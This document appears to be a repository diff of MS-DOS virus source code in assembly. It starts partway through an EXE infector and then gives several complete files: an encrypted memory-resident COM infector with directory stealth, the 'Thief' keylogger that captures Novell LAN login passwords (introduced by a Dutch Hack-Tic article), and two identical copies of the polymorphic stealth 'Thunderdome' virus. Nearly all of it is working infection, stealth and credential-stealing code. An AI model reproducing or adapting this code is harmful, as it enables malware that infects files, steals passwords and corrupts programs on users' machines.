inc si
mov ah,47h ; get current directory
xor dl,dl
push ds
push ss
pop ds
int 21h
pop ds
dec si
mov byte ptr ss:[si],'\' ; fix directory
next_dir:
call infect_dir
cmp byte ptr [bp + infections],INFECT
je traverse_done
lea dx,[bp + outer] ; repeat in next dir up
mov ah,3Bh
int 21h
jnc next_dir
traverse_done:
add sp,64 ; reset
mov dx,si
push ds
push ss
pop ds
mov ah,3Bh
int 21h
pop ds
ret
infect_dir:
mov ah,4Eh
lea dx,[bp + find_me]
int 21h
jc infect_done
next_file:
lea dx,[bp + new_DTA + 1Eh]
call execute
cmp byte ptr [bp + infections],INFECT
je infect_done
mov ah,4Fh
int 21h
jnc next_file
infect_done:
ret
execute:
push si
mov ax,4300h ; change attributes
int 21h
push cx dx ds
xor cx,cx
call set_attributes
mov ax,3D02h ; open file
int 21h
jc cant_open
xchg bx,ax
mov ax,5700h ; save file date/time
int 21h
push cx dx
mov ah,3Fh
mov cx,28
lea dx,[bp + read_buffer]
int 21h
cmp word ptr [bp + read_buffer],'ZM'
je infect_exe ; yes, infect as .EXE
jmp dont_infect
fix_date_time:
pop dx cx
mov ax,5701h ; restore file date/time
int 21h
inc byte ptr [bp + infections]
close:
pop ds dx cx ; restore attributes
call set_attributes
mov ah,3Eh ; close file
int 21h
cant_open:
pop si
ret
set_attributes:
mov ax,4301h
int 21h
ret
dont_infect:
pop cx dx ; can't infect, skip
jmp close
infect_exe:
cmp word ptr [bp + read_buffer + 26],0
jne dont_infect ; overlay, don't infect
cmp word ptr [bp + read_buffer + 16],MARKER
je dont_infect ; infected already
les ax,dword ptr [bp + read_buffer + 20]
mov [bp + exe_cs],es
mov [bp + exe_ip],ax
les ax,dword ptr [bp + read_buffer + 14]
mov [bp + exe_ss],ax
mov [bp + exe_sp],es
mov word ptr [bp + read_buffer + 16],MARKER
mov ax,4202h ; to end of file
cwd
xor cx,cx
int 21h
push ax dx ; save file size
push bx
mov cl,12 ; calculate offsets for CS
shl dx,cl ; and IP
mov bx,ax
mov cl,4
shr bx,cl
add dx,bx
and ax,15
pop bx
sub dx,word ptr [bp + read_buffer + 8]
mov word ptr [bp + read_buffer + 22],dx
mov word ptr [bp + read_buffer + 20],ax
add dx,100h
mov word ptr [bp + read_buffer + 14],dx
pop dx ax ; calculate prog size
add ax,VIRUS_SIZE + 3
adc dx,0
mov cx,512 ; in pages
div cx ; then save results
inc ax
mov word ptr [bp + read_buffer + 2],dx
mov word ptr [bp + read_buffer + 4],ax
mov ah,40h
mov cx,VIRUS_SIZE + 3
lea dx,[bp + virus_begin]
int 21h
mov ax,4200h ; back to beginning
cwd
xor cx,cx
int 21h
mov ah,40h ; and fix up header
mov cx,28
lea dx,[bp + read_buffer]
int 21h
jmp fix_date_time ; done
activate:
; Insert your routine here
ret
courtesy_of db '[BW]',0
signature db 'Test virus #2',0
get_extension:
push ds ; find extension
pop es
mov di,dx
mov cx,64
mov al,'.'
repnz scasb
ret
find_me db '*.EXE',0
outer db '..',0
infections db 0
virus_end:
VIRUS_SIZE equ virus_end - virus_begin
read_buffer db 28 dup (?) ; read buffer
new_DTA db 128 dup(?)
end_heap:
MEM_SIZE equ end_heap - start
code ends
end start

318
MSDOS/Virus.MSDOS.Unknown.test3.asm Normal file
View File

@ -0,0 +1,318 @@
; test3.asm : Test virus #3
; Created with Biological Warfare - Version 0.90á by MnemoniX
PING equ 0FA10h
PONG equ 0B8D4h
STAMP equ 31
code segment
org 0
assume cs:code,ds:code
start:
db 0E9h,3,0 ; to virus
host:
db 0CDh,20h,0 ; host program
virus_begin:
db 0BBh ; decryption module
code_offset dw offset virus_code
mov si,VIRUS_SIZE / 2 + 1
db 0B8h
cipher dw 0
decrypt:
xor cs:[bx],ax
add bx,2
dec si
jnz decrypt
virus_code:
push ds es
call $ + 3 ; BP is instruction ptr.
pop bp
sub bp,offset $ - 1
mov ax,PING ; test for residency
int 21h
cmp dx,PONG
je installed
mov ax,es ; Get PSP
dec ax
mov ds,ax ; Get MCB
sub word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64
sub word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64
mov es,word ptr ds:[12h]
push cs ; copy virus into memory
pop ds
xor di,di
mov si,bp
mov cx,(virus_end - start) / 2 + 1
rep movsw
xor ax,ax ; capture interrupts
mov ds,ax
mov si,21h * 4 ; get original int 21
mov di,offset old_int_21
movsw
movsw
mov word ptr ds:[si - 4],offset new_int_21
mov ds:[si - 2],es ; and set new int 21
installed:
pop es ds ; restore segregs
com_exit:
lea si,[bp + host] ; restore host program
mov di,100h
push di
movsw
movsb
call fix_regs ; fix up registers
ret ; and leave
fix_regs:
xor ax,ax
cwd
xor bx,bx
mov si,100h
xor di,di
xor bp,bp
ret
; interrupt 21 handler
int_21:
pushf
call dword ptr cs:[old_int_21]
ret
new_int_21:
cmp ax,PING ; residency test
je ping_pong
cmp ah,11h ; directory stealth
je dir_stealth
cmp ah,12h
je dir_stealth
cmp ah,4Eh ; directory stealth
je dir_stealth_2
cmp ah,4Fh
je dir_stealth_2
cmp ax,4B00h ; execute program
jne int_21_exit
jmp execute
int_21_exit:
db 0EAh ; never mind ...
old_int_21 dd 0
ping_pong:
mov dx,PONG
iret
dir_stealth:
call int_21 ; get dir entry
test al,al
js dir_stealth_done
push ax bx es
mov ah,2Fh
int 21h
cmp byte ptr es:[bx],-1 ; check for extended FCB
jne no_ext_FCB
add bx,7
no_ext_FCB:
mov ax,es:[bx + 17h] ; check for infection marker
and al,31
cmp al,STAMP
jne dir_fixed
sub word ptr es:[bx + 1Dh],VIRUS_SIZE + 3
sbb word ptr es:[bx + 1Fh],0
dir_fixed:
pop es bx ax
dir_stealth_done:
iret
dir_stealth_2:
pushf
call dword ptr cs:[old_int_21]
jc dir_stealth_done_2
check_infect2:
push ax bx es
mov ah,2Fh
int 21h
mov ax,es:[bx + 16h]
and al,31 ; check timestamp
cmp al,STAMP
jne fixed_2
sub es:[bx + 1Ah],VIRUS_SIZE + 3
sbb word ptr es:[bx + 1Ch],0
fixed_2:
pop es bx ax
clc ; clear carry
dir_stealth_done_2:
retf 2
execute:
push ax bx cx dx si di ds es
xor ax,ax ; critical error handler
mov es,ax ; routine - catch int 24
mov es:[24h * 4],offset int_24
mov es:[24h * 4 + 2],cs
mov ax,4300h ; change attributes
int 21h
push cx dx ds
xor cx,cx
call set_attributes
mov ax,3D02h ; open file
int 21h
jc cant_open
xchg bx,ax
push cs ; CS = DS
pop ds
mov ax,5700h ; save file date/time
int 21h
push cx dx
mov ah,3Fh
mov cx,28
mov dx,offset read_buffer
int 21h
cmp word ptr read_buffer,'ZM' ; .EXE?
je dont_infect ; .EXE, skip
mov al,2 ; move to end of file
call move_file_ptr
cmp dx,65279 - (VIRUS_SIZE + 3)
ja dont_infect ; too big, don't infect
sub dx,VIRUS_SIZE + 3 ; check for previous infection
cmp dx,word ptr read_buffer + 1
je dont_infect
add dx,VIRUS_SIZE + 3
mov word ptr new_jump + 1,dx
add dx,103h
call encrypt_code ; encrypt virus
mov dx,offset read_buffer ; save original program head
int 21h
mov ah,40h ; write virus to file
mov cx,VIRUS_SIZE
mov dx,offset encrypt_buffer
int 21h
xor al,al ; back to beginning of file
call move_file_ptr
mov dx,offset new_jump ; and write new jump
int 21h
fix_date_time:
pop dx cx
and cl,-32 ; add time stamp
or cl,STAMP
mov ax,5701h ; restore file date/time
int 21h
close:
pop ds dx cx ; restore attributes
call set_attributes
mov ah,3Eh ; close file
int 21h
cant_open:
pop es ds di si dx cx bx ax
jmp int_21_exit ; leave
set_attributes:
mov ax,4301h
int 21h
ret
dont_infect:
pop cx dx ; can't infect, skip
jmp close
move_file_ptr:
mov ah,42h ; move file pointer
cwd
xor cx,cx
int 21h
mov dx,ax ; set up registers
mov ah,40h
mov cx,3
ret
courtesy_of db '[BW]',0
signature db 'Test virus #3',0
encrypt_code:
push ax cx
push dx
xor ah,ah ; get time for random number
int 1Ah
mov cipher,dx ; save encryption key
pop cx
add cx,virus_code - virus_begin
mov code_offset,cx ; save code offset
push cs ; ES = CS
pop es
mov si,offset virus_begin ; move decryption module
mov di,offset encrypt_buffer
mov cx,virus_code - virus_begin
rep movsb
mov cx,VIRUS_SIZE / 2 + 1
encrypt:
lodsw ; encrypt virus code
xor ax,dx
stosw
loop encrypt
pop cx ax
ret
int_24:
mov al,3 ; int 24 handler
iret
new_jump db 0E9h,0,0
virus_end:
VIRUS_SIZE equ virus_end - virus_begin
read_buffer db 28 dup (?) ; read buffer
encrypt_buffer db VIRUS_SIZE dup (?) ; encryption buffer
end_heap:
MEM_SIZE equ end_heap - start
code ends
end start

269
MSDOS/Virus.MSDOS.Unknown.thief.asm Normal file
View File

@ -0,0 +1,269 @@
;redaktie van The Key, John D., Tx, Herman Acker, Peter Poelman, Paul en Rop.
;Nadruk wordt door de redaktie toegestaan!
;------------------------------------------------------------------------------
;
; Als je via een Local Area Network onder MS-DOS files wilt kunnen bewerken
;kun je bijna niet om de Novell networksoftware heen. Of je nou op je werk of
;op school met Novell werkt: je hebt altijd te weinig bevoegdheid op het
;systeem. Hack-Tic helpt je door te dringen in het systeem met dit artikel van
;een anonieme auteur.
;
; THIEF is een TSR (Terminate and Stay Resident; geheugen-resident) programma
;voor de IBM-compatible, geschreven in 8086 machinetaal. Het probeert om
;wachtwoorden voor het Novell PC Local Area Netwerk te stellen. De oorsprong
;van THIEF ligt op een school met een bloeiende hack-cultuur: George Washington
;High School in Denver, Colorado USA.
; Deze school is meer dan goed voorzien van IBM micro's. Vijf lokalen van 30
;computers hangen allemaal via een ethernet aan elkaar. Het netwerk draait
;onder Novell. Vier van de vijf lokalen gebruiken boot-proms [geheugenchips op
;de netwerk-interfacekaart. Zij zorgen ervoor dat er opgestart kan worden
;zonder dat er een disk (of zelfs een drive(!) nodig is op de betreffende
;machine.] voor het opstarten van de PC's. De vijfde ruimte bevat IBM PS/2
;model 80's(!) met harddisks. De systeembeheerders en andere "power-users"
;maken graag gebruik van deze machines. Deze machines "booten" vanaf hun eigen
;hard-disks, zij gebruiken geen boot-proms.
; Op een van deze computers werd THIEF voor het eerst gesignaleerd. THIEF
;maakt namelijk gebruik van een zwakheid in de beveiliging tijdens de bootfase.
;In de AUTOEXEC.BAT file werd een extra regel toegevoegd die een "verborgen"
;programma op de bootschijf activeerde. Zodra er echter een programma met de
;naam LOGIN wordt uitgevoerd komt THIEF tot leven en hij slaat alle
;toetsaanslagen op in een (eveneens verborgen) file op de boot disk. De
;onbevoegde kan later terugkomen en kijken wat zijn val gevangen heeft.
; Voordat we het "metabolisme" van THIEF verder gaan ontleden eerst even de
;zwakheden die deze hack mogelijk maken:
; -Een boot-proces dat veranderd kan worden
; -Fysieke toegang (door een onbevoegde) tot de computer
; Beide zijn goed te verhelpen. Boot-proms en een slot op de deur en klaar is
;Kees.
; Terug naar het "metabolisme". Nogal verassend is dat het programma dezelfde
;"hook" gebruikt als de Novell shell. Het grijpt de centrale toegang naar DOS:
;interrupt 21h [ (hex) wordt door programma's gebruikt om een DOS functie aan te
;roepen. De Novell-Netware shell onderschept deze stroom om zondig zelf op
;bepaalde verzoeken te reageren. ]. Het onderschept alle aanroepen naar DOS.
;Zodra een EXECute file call wordt gemaakt met de filename LOGIN worden alle
;toetsaanslagen vastgelegd totdat het programma terugkeert naar DOS. Tijdens het
;LOGIN process wordt het Novell wachtwoord ingetikt en dus is de hacker een
;wachtwoord rijker. Het is allemaal nog iets te ingewikkeld: het programma had
;ook gewoon op de speciale Novell inlog functieaanroep kunnen wachten.Maar ach,
;zo werkt het ook.
; Dit soort programma's zijn alles behalve nieuw. Ze zijn net zo oud als
;wachtwoord-beveiliging. Bestudering van dit programma geeft meer inzicht in de
;problematiek van LAN-beveiliging.
; De toekomst zal zeker geheel nieuwe identificatietechnieken brengen. Net zo
;zeker is dat zij begroet zullen worden door geduldige, enigszins doortrapte
;genialiteit.
;
; Opmerking: THIEF werd door zijn maker ook wel eens GETIT genoemd. De maker
;was gelukkig onvoorzichtig genoeg om de sourcecode te laten slingeren.
;
;
; DE CODE VAN THIEF:
;
;
cseg segment
assume cs:cseg,ds:cseg
org 100h
public oi21,ac,ob,fn,fh,flag,ni21,jtov,oc,lethro,wpwtf,exist,create,
public cntr,lits,begin
.RADIX 16
start:
push cs
push cs
push cs
pop ds
pop es
mov ax,0fffeh
CLI
pop ss
mov sp,ax
STI
jmp begin
oi21 dd ?
ac dw 0
ob dw 80h dup (?)
buff2 db 80h dup (?)
fn db 'c:\testing.tmp',0,' '
search1 db 'LOGIN'
foundf db 0
fh dw 0
flag db 0
cntr dw 0
ni21:
assume cs:cseg,ds:nothing,es:nothing
cmp ax,4b00h
je exec
cmp foundf,0ffh
jne nc
cmp ah,8
je oc
cmp ah,7
je oc
nc:
push ax
mov al,cs:flag
not al
cmp al,0
jne jtov
mov ax,cntr
inc ax
mov cntr,ax
cmp ax,31h
jb jtov
xor ax,ax
mov cntr,ax
mov flag,al
pop ax
pushf
call dword ptr [oi21]
push ds
push cs
pop ds
push ax
push bx
push cx
push dx
jmp short wpwtf
jtov:
pop ax
jmp dword ptr cs:[oi21]
exec: call scanfor
jmp nc
oc:
pushf
call dword ptr cs:[oi21]
assume ds:cseg
push ds
push cs
pop ds
push ax
push bx
push cx
push dx
mov bx,ac
mov [bx],al
inc bx
mov [ac],bx
cmp al,0dh
jne lethro
mov byte ptr [bx],0ah
not cs:[flag]
lethro:
pop dx
pop cx
pop bx
pop ax
pop ds
iret
scanfor:
push ax
push di
push si
push es
push ds
push cs
push cs
pop es
mov si,dx
mov di,offset buff2
moveit:
lodsb
and al,0dfh
stosb
or al,al
jnz moveit
pop ds
mov di,offset buff2
look:
push di
mov si,offset search1
mov cx,5
repe cmpsb
pop di
or cx,cx
jz foundit
inc di
cmp byte ptr [di+5],0
je not_found
jmp look
not_found:
xor ax,ax
mov foundf,al
jmp short endofsearch
foundit:
mov ax,0ffh
mov foundf,al
endofsearch:
pop ds
pop es
pop si
pop di
pop ax
ret
wpwtf:
mov ax,3d02h
mov dx,offset fn
pushf
call dword ptr [oi21]
jnc exist
cmp al,2
je create
jmp lethro
create:
mov ah,3ch
mov dx,offset fn
mov cx,02h+04h
pushf
call dword ptr [oi21]
jnc exist
jmp lethro
exist:
mov fh,ax
mov bx,ax
mov ax,4202h
xor cx,cx
xor dx,dx
pushf
call dword ptr [oi21]
mov cx,[ac]
mov dx,offset ob
sub cx,dx
mov [ac],dx
inc cx
mov bx,fh
mov ah,40h
pushf
call dword ptr [oi21]
mov ah,3eh
mov bx,fh
pushf
call dword ptr [oi21]
jmp lethro
lits db 90h
begin:
mov ax,offset ob
mov [ac],ax
mov ax,3521h
int 21h
mov di,offset oi21
mov [di],bx
mov [di+2],es
mov dx,offset ni21
push cs
pop ds
mov ax,2521h
int 21h
mov dx,offset lits
int 27h
cseg ends
end start


403
MSDOS/Virus.MSDOS.Unknown.thunder.a86 Normal file
View File

@ -0,0 +1,403 @@
;
; Thunderdome virus by John Tardy / TridenT
;
Org 0h
decr: jmp Crypt
db 'Carcass'
Loopje DB 0e2h
db 0fah
DecrLen Equ $-Decr
Crypt: Push Ax
call Get_Ofs
Get_Ofs: pop Bp
sub Bp,Get_Ofs
Mov Ah,2ah
Int 21h
Cmp Cx,1993
Ja Makeya
jb Installed
Cmp Dh,10
Jb installed
Makeya: Mov Ax,0DEADh
Int 21h
Cmp Ax,0AAAAh
Je Installed
mov ax,3521h
int 21h
mov word ptr cs:old21[bp],bx
mov word ptr cs:old21[bp][2],es
mov ax,cs
dec ax
mov ds,ax
cmp byte ptr ds:[0000],'Z'
jne installed
mov ax,word ptr ds:[0003]
sub ax,ParLen
jb installed
mov word ptr ds:[0003],ax
sub word ptr ds:[0012h],ParLen
lea si,decr[bp]
xor di,di
mov es,ds:[12h]
mov ds,cs
mov cx,virlen
rep movsb
mov ax,2521h
mov ds,es
mov dx,offset new21
int 21h
Installed: Mov Di,100h
Push Di
Lea Si,Org_Prg[Bp]
Push Cs
Pop Ds
Push Cs
Pop Es
Movsw
Movsb
Pop Bx
Pop Ax
Jmp Bx
Old21 dd 0
New21: cmp ax,0deadh
jne chkfunc
mov cx,0aaaah
mov ax,cx
iret
chkfunc: cmp ah,12h
je findFCBst
cmp ah,11h
je findfcbst
cmp ah,4fh
je findst
cmp ah,4eh
je findst
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es
cmp ah,3dh
je infectHan
cmp ah,4bh
je infectHan
cmp ah,41h
je infectHan
cmp ah,43h
je infectHan
cmp ah,56h
je infectHan
cmp ah,0fh
je infectFCB
cmp ah,23h
je infectFCB
cmp ah,6ch
je infectdos4
jmp endint
findfcbst: jmp findfcb
findst: jmp find
InfectFCB: mov si,dx
lodsb
push cs
pop es
lea di,fnam
mov cx,8
rep movsb
mov cx,3
inc di
rep movsb
lea dx,fnam
push cs
pop ds
InfectHan: mov si,dx
mov cx,100h
findpnt: lodsb
cmp al,'.'
je chkcom
loop findpnt
jmp endi
infectdos4: and dx,0fh
cmp dx,1
jne endi
mov dx,si
jmp infecthan
chkcom: lodsw
or ax,2020h
cmp ax,'oc'
jne endi
lodsb
or al,20h
cmp al,'m'
je doitj
endi: jmp endint
doitj: push dx
push ds
mov ax,4300h
call dos
mov cs:fatr,cx
mov ax,4301h
sub cx,cx
call dos
mov ax,3d02h
call dos
jnc getdate
jmp error
getdate: mov bx,5700h
xchg ax,bx
call dos
mov cs:fdat,cx
mov cs:fdat+2,dx
and cx,1fh
cmp cx,1fh
jne chkexe
jmp done
chkexe: mov ah,3fh
push cs
pop ds
lea dx,Org_prg
mov cx,3
call dos
cmp word ptr cs:Org_prg[0],'MZ'
je close
cmp word ptr cs:Org_prg[0],'ZM'
je close
Mov ax,4202h
sub cx,cx
cwd
call dos
sub ax,3
mov cs:jump[1],ax
Add Ax,Offset Crypt+103h
Mov S_1[1],Ax
Mov S_2[1],Ax
Mov S_3[4],Ax
Mov S_4[4],Ax
Call GenPoly
mov ah,40h
push cs
pop ds
lea dx,coder
mov cx,virlen
call dos
mov ax,4200h
xor cx,cx
cwd
call dos
mov ah,40h
lea dx,jump
mov cx,3
call dos
or cs:fdat,01fh
close: mov ax,5701h
mov cx,cs:fdat
mov dx,cs:fdat[2]
call dos
done: mov ah,3eh
call dos
pop ds
pop dx
push dx
push ds
mov ax,4301h
mov cx,fatr
call dos
error: pop ds
pop dx
endint: pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
jmp d ptr cs:[old21]
GenPoly: Xor Byte Ptr [Loopje],2
Xor Ax,Ax
Mov Es,Ax
Mov Ax,Es:[46ch]
Mov Es,Cs
Push Ax
And Ax,07ffh
Add Ax,CryptLen
Mov S_1[4],Ax
Mov S_2[4],Ax
Mov S_3[1],Ax
Mov S_4[1],Ax
Doit: Pop Ax
Push Ax
And Ax,3
Shl Ax,1
Mov Si,Ax
Mov Ax,W Table[Si]
Mov Si,Ax
Lea Di,decr
Movsw
Movsw
Movsw
Movsw
Pop Ax
Stosb
Movsb
Mov Dl,Al
Lea Si,Decr
Lea Di,Coder
Mov Cx,DecrLen
Rep Movsb
Lea Si,Crypt
Mov Cx,CryptLen
Encrypt: Lodsb
Xor Al,Dl
Stosb
Loop Encrypt
Cmp Dl,0
Je Fuckit
Ret
FuckIt: Lea Si,Encr0
Lea Di,Coder
Mov Cx,Encr0Len
Rep Movsb
Mov Ax,Cs:jump[1]
Add Ax,Encr0Len+2
Mov Cs:jump[1],Ax
Ret
Db 13,10,'Created in Holland, released near Bolzano/Italy.'
Db 13,10,'This virus is made to test the spreading rate of viruses in Italy. It is not'
Db 13,10,'ment to be destructive, however, some programs might not work anymore,'
Db 13,10,'because of CRC-checking. I am sorry if I accidentally corrupted one of your'
Db 13,10,'programs, but HEY! That is how life is, eh? Try to get our virus collection!'
Db 13,10,'and try TPE, or DMU (another one, more compact and also very complex!).'
Db 13,10,'Greetings go to all other virus writers!'
Table DW Offset S_1,Offset S_2,Offset S_3,Offset S_4
S_1: Lea Si,0
Mov Cx,0
DB 80h,34h
Inc Si
S_2: Lea Di,0
Mov Cx,0
DB 80h,35h
Inc Di
S_3: Mov Cx,0
Lea Si,0
DB 80h,34h
Inc Si
S_4: Mov Cx,0
Lea Di,0
DB 80h,35h
Inc Di
Db '[ "Thunderdome" virus by '
Encr0 Db 'John Tardy'
Encr0Len Equ $-Encr0
Db ' / TridenT ]'
getdta: pop si
pushf
push ax
push bx
push es
mov ah,2fh
call dos
jmp short si
FindFCB: call DOS
cmp al,0
jne Ret1
call getdta
cmp byte ptr es:[bx],-1
jne FCBOk
add bx,8
FCBOk: mov al,es:[bx+16h]
and al,1fh
cmp al,1fh
jne FileOk
sub word ptr es:[bx+1ch],Virlen
sbb word ptr es:[bx+1eh],0
jmp short Time
Find: call DOS
jc Ret1
call getdta
mov al,es:[bx+16h]
and al,1fh
cmp al,1fh
jne FileOk
sub word ptr es:[bx+1ah],VirLen
sbb word ptr es:[bx+1ch],0
Time: xor byte ptr es:[bx+16h],10h
FileOk: pop es
pop bx
pop ax
popf
Ret1: retf 2
dos: pushf
call dword ptr cs:[old21]
ret
Org_prg dw 0cd90h
db 20h
fnam db 8 dup (0)
db '.'
db 3 dup (0)
db 0
fatr dw 0
fdat dw 0,0
jump db 0e9h,0,0
ResLen Equ ($-Decr)/10h
ParLen Equ (Reslen*2)+10h
CryptLen Equ $-Crypt
VirLen Equ $-Decr
Coder Equ $
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄ> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <ÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

403
MSDOS/Virus.MSDOS.Unknown.thunder.asm Normal file
View File

@ -0,0 +1,403 @@
;
; Thunderdome virus by John Tardy / TridenT
;
Org 0h
decr: jmp Crypt
db 'Carcass'
Loopje DB 0e2h
db 0fah
DecrLen Equ $-Decr
Crypt: Push Ax
call Get_Ofs
Get_Ofs: pop Bp
sub Bp,Get_Ofs
Mov Ah,2ah
Int 21h
Cmp Cx,1993
Ja Makeya
jb Installed
Cmp Dh,10
Jb installed
Makeya: Mov Ax,0DEADh
Int 21h
Cmp Ax,0AAAAh
Je Installed
mov ax,3521h
int 21h
mov word ptr cs:old21[bp],bx
mov word ptr cs:old21[bp][2],es
mov ax,cs
dec ax
mov ds,ax
cmp byte ptr ds:[0000],'Z'
jne installed
mov ax,word ptr ds:[0003]
sub ax,ParLen
jb installed
mov word ptr ds:[0003],ax
sub word ptr ds:[0012h],ParLen
lea si,decr[bp]
xor di,di
mov es,ds:[12h]
mov ds,cs
mov cx,virlen
rep movsb
mov ax,2521h
mov ds,es
mov dx,offset new21
int 21h
Installed: Mov Di,100h
Push Di
Lea Si,Org_Prg[Bp]
Push Cs
Pop Ds
Push Cs
Pop Es
Movsw
Movsb
Pop Bx
Pop Ax
Jmp Bx
Old21 dd 0
New21: cmp ax,0deadh
jne chkfunc
mov cx,0aaaah
mov ax,cx
iret
chkfunc: cmp ah,12h
je findFCBst
cmp ah,11h
je findfcbst
cmp ah,4fh
je findst
cmp ah,4eh
je findst
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es
cmp ah,3dh
je infectHan
cmp ah,4bh
je infectHan
cmp ah,41h
je infectHan
cmp ah,43h
je infectHan
cmp ah,56h
je infectHan
cmp ah,0fh
je infectFCB
cmp ah,23h
je infectFCB
cmp ah,6ch
je infectdos4
jmp endint
findfcbst: jmp findfcb
findst: jmp find
InfectFCB: mov si,dx
lodsb
push cs
pop es
lea di,fnam
mov cx,8
rep movsb
mov cx,3
inc di
rep movsb
lea dx,fnam
push cs
pop ds
InfectHan: mov si,dx
mov cx,100h
findpnt: lodsb
cmp al,'.'
je chkcom
loop findpnt
jmp endi
infectdos4: and dx,0fh
cmp dx,1
jne endi
mov dx,si
jmp infecthan
chkcom: lodsw
or ax,2020h
cmp ax,'oc'
jne endi
lodsb
or al,20h
cmp al,'m'
je doitj
endi: jmp endint
doitj: push dx
push ds
mov ax,4300h
call dos
mov cs:fatr,cx
mov ax,4301h
sub cx,cx
call dos
mov ax,3d02h
call dos
jnc getdate
jmp error
getdate: mov bx,5700h
xchg ax,bx
call dos
mov cs:fdat,cx
mov cs:fdat+2,dx
and cx,1fh
cmp cx,1fh
jne chkexe
jmp done
chkexe: mov ah,3fh
push cs
pop ds
lea dx,Org_prg
mov cx,3
call dos
cmp word ptr cs:Org_prg[0],'MZ'
je close
cmp word ptr cs:Org_prg[0],'ZM'
je close
Mov ax,4202h
sub cx,cx
cwd
call dos
sub ax,3
mov cs:jump[1],ax
Add Ax,Offset Crypt+103h
Mov S_1[1],Ax
Mov S_2[1],Ax
Mov S_3[4],Ax
Mov S_4[4],Ax
Call GenPoly
mov ah,40h
push cs
pop ds
lea dx,coder
mov cx,virlen
call dos
mov ax,4200h
xor cx,cx
cwd
call dos
mov ah,40h
lea dx,jump
mov cx,3
call dos
or cs:fdat,01fh
close: mov ax,5701h
mov cx,cs:fdat
mov dx,cs:fdat[2]
call dos
done: mov ah,3eh
call dos
pop ds
pop dx
push dx
push ds
mov ax,4301h
mov cx,fatr
call dos
error: pop ds
pop dx
endint: pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
jmp d ptr cs:[old21]
GenPoly: Xor Byte Ptr [Loopje],2
Xor Ax,Ax
Mov Es,Ax
Mov Ax,Es:[46ch]
Mov Es,Cs
Push Ax
And Ax,07ffh
Add Ax,CryptLen
Mov S_1[4],Ax
Mov S_2[4],Ax
Mov S_3[1],Ax
Mov S_4[1],Ax
Doit: Pop Ax
Push Ax
And Ax,3
Shl Ax,1
Mov Si,Ax
Mov Ax,W Table[Si]
Mov Si,Ax
Lea Di,decr
Movsw
Movsw
Movsw
Movsw
Pop Ax
Stosb
Movsb
Mov Dl,Al
Lea Si,Decr
Lea Di,Coder
Mov Cx,DecrLen
Rep Movsb
Lea Si,Crypt
Mov Cx,CryptLen
Encrypt: Lodsb
Xor Al,Dl
Stosb
Loop Encrypt
Cmp Dl,0
Je Fuckit
Ret
FuckIt: Lea Si,Encr0
Lea Di,Coder
Mov Cx,Encr0Len
Rep Movsb
Mov Ax,Cs:jump[1]
Add Ax,Encr0Len+2
Mov Cs:jump[1],Ax
Ret
Db 13,10,'Created in Holland, released near Bolzano/Italy.'
Db 13,10,'This virus is made to test the spreading rate of viruses in Italy. It is not'
Db 13,10,'ment to be destructive, however, some programs might not work anymore,'
Db 13,10,'because of CRC-checking. I am sorry if I accidentally corrupted one of your'
Db 13,10,'programs, but HEY! That is how life is, eh? Try to get our virus collection!'
Db 13,10,'and try TPE, or DMU (another one, more compact and also very complex!).'
Db 13,10,'Greetings go to all other virus writers!'
Table DW Offset S_1,Offset S_2,Offset S_3,Offset S_4
S_1: Lea Si,0
Mov Cx,0
DB 80h,34h
Inc Si
S_2: Lea Di,0
Mov Cx,0
DB 80h,35h
Inc Di
S_3: Mov Cx,0
Lea Si,0
DB 80h,34h
Inc Si
S_4: Mov Cx,0
Lea Di,0
DB 80h,35h
Inc Di
Db '[ "Thunderdome" virus by '
Encr0 Db 'John Tardy'
Encr0Len Equ $-Encr0
Db ' / TridenT ]'
getdta: pop si
pushf
push ax
push bx
push es
mov ah,2fh
call dos
jmp short si
FindFCB: call DOS
cmp al,0
jne Ret1
call getdta
cmp byte ptr es:[bx],-1
jne FCBOk
add bx,8
FCBOk: mov al,es:[bx+16h]
and al,1fh
cmp al,1fh
jne FileOk
sub word ptr es:[bx+1ch],Virlen
sbb word ptr es:[bx+1eh],0
jmp short Time
Find: call DOS
jc Ret1
call getdta
mov al,es:[bx+16h]
and al,1fh
cmp al,1fh
jne FileOk
sub word ptr es:[bx+1ah],VirLen
sbb word ptr es:[bx+1ch],0
Time: xor byte ptr es:[bx+16h],10h
FileOk: pop es
pop bx
pop ax
popf
Ret1: retf 2
dos: pushf
call dword ptr cs:[old21]
ret
Org_prg dw 0cd90h
db 20h
fnam db 8 dup (0)
db '.'
db 3 dup (0)
db 0
fatr dw 0
fdat dw 0,0
jump db 0e9h,0,0
ResLen Equ ($-Decr)/10h
ParLen Equ (Reslen*2)+10h
CryptLen Equ $-Crypt
VirLen Equ $-Decr
Coder Equ $
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄ> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <ÄÄÄÄÄÄÄÄÄÄÄ
